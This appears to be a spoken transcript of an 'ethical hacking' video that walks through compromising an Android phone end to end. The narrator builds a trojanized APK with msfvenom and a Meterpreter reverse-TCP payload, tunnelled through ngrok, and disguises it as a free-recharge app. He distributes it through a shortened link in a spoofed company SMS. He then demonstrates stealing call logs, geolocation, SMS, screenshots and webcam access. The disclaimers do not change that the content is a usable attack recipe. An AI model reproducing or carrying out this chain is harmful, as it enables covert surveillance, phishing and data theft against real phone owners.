What is up, people? Welcome to another brand new ethical hacking video tutorial. This is Teja, and in this video I'm going to show you how you can actually get access into a smartphone by just sending an SMS. Now please note that this video is intended only to bring awareness in people about how simple and how easy it is for the smartphone to get hacked, and this video is only for educational purposes and I'm not responsible for any of your actions. So without further ado, let's get started. So first of all, open your browser and then go to ngrok.com. If you don't know what is meant by ngrok, it is basically a tool to create a secure tunnel from your local host to the ngrok server so that your server can be accessible by the whole internet. So if you don't have account in ngrok, just click on sign up and create an account. But since I already have an ngrok account, I'll be logging into my account. And once you log in, just download ngrok for your operating system, and since I've already downloaded it for my Mac OS X, I'm not going to do it now. Alright, so once you download it, just go to AUTH, and over here you can find your authentication token. So what you need to do is just copy this command over here, and then search for the directory where the ngrok is downloaded on your computer. In my case, it's downloaded in the downloads folder. So after doing that, open your terminal or your command prompt and then head to the directory where the ngrok is downloaded. So I'll go to downloads and then I'll paste this command. So once you do that, your authentication will be saved so that your identity can be verified by ngrok and you can start using ngrok from now. So once you do that, you can clear the screen, and over here type in /ngrok space TCP space 1560 and hit enter, and there you go. You have successfully created an ngrok tunnel. So basically you have created an ngrok tunnel from your local host to ngrok servers, and you can note down this unique port number. This will be very useful for us throughout this video, so make sure you keep this prompt open. So now you need to download a trusted APK so that we can bind our payload with that APK. So in this video, I'll be using the MyIdea APK, which is the official Android app for Idea users in India. So I'll be downloading this MyIdea recharge and payments APK. So after the download, I'm going to rename this to something simpler like myidea.apk so that it is not too big, not confusing. Alright, so I've renamed it to myidea.apk. Alright, so once you download a trusted APK, open a new terminal window or a new command prompt window, and now we need to create our payload and bind it with the official and trusted APK. And to do this, we need MSF Venom. It comes pre-installed in Kali Linux, and if you're using Mac or Windows, you'll have to install it externally. Alright, so I'll be using MSF Venom, and first of all I'll be navigating to my desktop folder, to my downloads folder actually, so that this is where the downloaded MyIdea APK file is saved, as you could see. So I'll be navigating to my downloads. Once I'm in my downloads directory where the original APK file is present, I'll be doing MSF Venom space -x space the name of the APK, which is myidea.apk, space -p, and then the payload we are using, which is Android/meterpreter/reverse TCP in this case, space lhost equal to, and in this lhost we need to type in 0.tcp.ngrok.io, which is the host of the ngrok servers, and then L port equal to, followed by the unique port number which we got in our ngrok prompt. So you can just copy this unique port over here, and you can paste it in the L ports section of the command, and then followed by space -o, and then the directory where you want the output backdoored APK file to be saved on your computer. So I'll be saving it on my desktop, so I'll say users Tejaswarup desktop, and I'll be renaming it, and I'll be naming it something like myidea free recharge.apk so that it doesn't look suspicious. So this is what my output directory and the name of my output file looks like. So once you type this command, just hit enter, and this is going to first of all decompile the original APK, and then it's going to create our payload, our Android Meterpreter reverse TCP payload, and it's going to then add our payload to the decompiled original APK, and then it's going to recompile it, and then it's going to sign it, so that nothing looks suspicious, and our payload will be perfectly binded with the original and official and trusted APK of My Idea app. So we'll be needing to wait for some time for this to happen. Alright, so now you could see that the process is done, and our backdoor APK file is saved in the desktop as my idea free recharge.apk. So there you go. This is our APK, which has the binded payload of ours. So now we need to initialize an MSF console window and start listening to our local host and the port 1560, so that we will be able to get any connections from the victim's APK file. So you can just say MSF console after installing it, and you will be taken to the MSF console window. And over here, first of all, type in use multi/handler and hit enter. There we go. And now type in set payload space the payload, which is Android/Meterpreter/reverse TCP. Please note that this is the exact same payload which we have used earlier for creating our backdoor. And then set lhost space 127.0.0.1, which is our local host, and hit enter. And now you need to set the L port, which is 1560. There you go. This is the port number that we should be listening to, 1560. You can just copy it from the ngrok prompt and you can paste it here and hit enter. And now, just to make sure we've set up everything, just type in show options, and there we go. Lhost and Lport are correct. They're perfectly set up. So now our backdoor APK is going to start a reverse TCP connection to the ngrok unique mode number, which we have created in the ngrok prompt window. And when that happens, that TCP request is going to be forwarded from the ngrok servers to our local host through the secure tunnel which we created through ngrok. And then once we have that request forwarded to our local host, since we are listening to our local host on that particular port number, we will be able to get that request on our computer, and in this way we can get access into the victim's smartphone. Alright, so now just type in exploit and hit enter, and then our MSF console starts listening to the L host, which is 127.0.0.1, and the L port, which is 1560. Alright, so now it's time that we actually make our victim to install this APK on his Android smartphone. So I'll be uploading this APK on filedropper.com. So this is my APK, my backdoor APK, and I'm uploading it to filedropper.com. And this is the link which the victim needs to visit to download the APK, but this link is kind of suspicious, I think. So I think we will just shorten this link using bit.ly. So I'm just going to copy this link and I'm going to paste it here, and I'm going to shorten this link. So there we go. This is the shortened link. And now we actually, when we actually visit this link, we'll be taken to this page where we can download the APK. So we want our victim to download this APK and install it on his smartphone. So we need to convince him to do that. And in order to do that, I'm going to do something like this. I'm going to send an SMS to his phone number. So now I'm going to use a website like SMS Country to send an SMS to the victim without actually revealing my phone number. So when I actually send an SMS using this website, it appears as if the message is received from a company. So we want the victim to believe that it is actually coming from a valid and a trusted company. So you can just register for an account if you don't have an account in SMS Country. So since I already have an account in SMS Country, I am going to log into my account. And then you just click on text SMS, and over here you can just send an SMS. So I'm going to send an SMS to my victim, which is going to be, I'm going to say something like, dear customer, get 5 GB free data for free for your idea number. So if in case my victim is using an idea number, and if I know that he's using an idea number, then I'll be sending an SMS like this to asking him to install the My Idea app to get 5 GB free data. So when I send this message, it kind of makes sense to the victim, and probably it will convince him to install that app, because my idea is an official app, and getting a message like this from some company makes sense to him. He may think that his number actually has an offer. So I'm going to send this message, and I'm going to also paste the link to download the APK file, and there we go. Now I'm going to send this message to the victim, and in this case the victim is myself for the demonstration purpose. So once you have entered the message and everything, you can just click on send message, and there you go, the SMS message is successfully sent. So on my smartphone you can see that I have received a message from an unknown number, and it seems like this message is coming from an actual company, and it says, dear customer, get 5 GB free data for your idea number by installing this app. So I'm going to open this link, obviously, because I have an idea number and I do want free data. So then I'm going to download the file now, and there you go, the file is now downloaded. So let me open the downloaded APK file and let me install it on my smartphone. So there you go, the app is now installed. Now let me tap on open, and there you go, this is the app. So I'm going to give it the permissions, and please also make sure that these permissions are also not suspicious, because for an app like my idea, all those permissions which I have allowed are required, they are necessary, so it's not suspicious. So as soon as the backdoor app is installed on the victim's phone, we can see that we have received a connection. There you go, which means that we now have an access to the victim's phone. Alright, so now you can just type in help here to see all the commands that you can execute on the victim's Android phone. So these are all the commands that you can execute on the victim's phone. So for example, let me show you some of the commands which are interesting. So let's say I want to locate the phone exactly, so I'll say geolocate and hit enter, and this is going to give the exact latitude and longitude position of the Android device. And then let's try this dump contacts and hit enter, and the command failed for some reason. Anyways, let's execute another command, dump call log, and see if we actually get this working. And there you go, the call log is fetched, and it says 733 entries are fetched. So the call log is also saved on the desktop. So let me go ahead and show you real quick where's the call log located. I think it's located in the root directory. Let me search for it. Yeah, and there we go, there is the call log. That is the call log that we have fetched from the victim smartphone. Let me open it, and there we go, we have all the call logs in this text file. Each and every call log is downloaded or it's fetched from the victim smartphone. So in the same way, I can also do dump underscore SMS to get all the SMS on the victim's mobile, and I can do send SMS to send an SMS from the victim's phone. So let me try this, send SMS, and it says that you have to follow some particular thing. So I need to say send underscore SMS space -d and then the mobile number to which I want to send the SMS. So I'm typing in my friend's mobile number to just test it out, and then the text message, which is, let's say I want to send hello to my friend. So I'm going to hit enter, and let's see if it works. Oh yeah, it did work out. Let's check out on our Android phone whether it did. So let me open my messages app, and there you go, the message is successfully sent. It says that sent by my idea, which is our backdoor APK, and yep, it did work fine. And we also have commands to record the microphone of the smartphone, and we can chat through the webcam, and we can list all the camera devices, and we can take a snapshot from the victim's webcam, and we can also stream live on the victim's webcam. So we have several commands like that. You can check out all these commands and you can execute. Do test it on your own mobile, and do not do it on any other's mobile without their consent, because that is illegal. So you can test it out on your own phone, and you can check out all these commands. Alright, let me show you one last command, screenshot, to take the screenshot of the victim's smartphone. So there you go, it says screenshot is saved to Tejas Swaroop / something like this. So where is that located? All right. Yeah, there we go. This is the screenshot that we have saved. So there you go. The screenshot is successfully downloaded from the victim smartphone. So you can execute many commands like this. Alright, so thanks for watching this video. Hope you learned something new, and please don't misuse this. It is actually illegal to hack someone's phone or whatever without their consent. So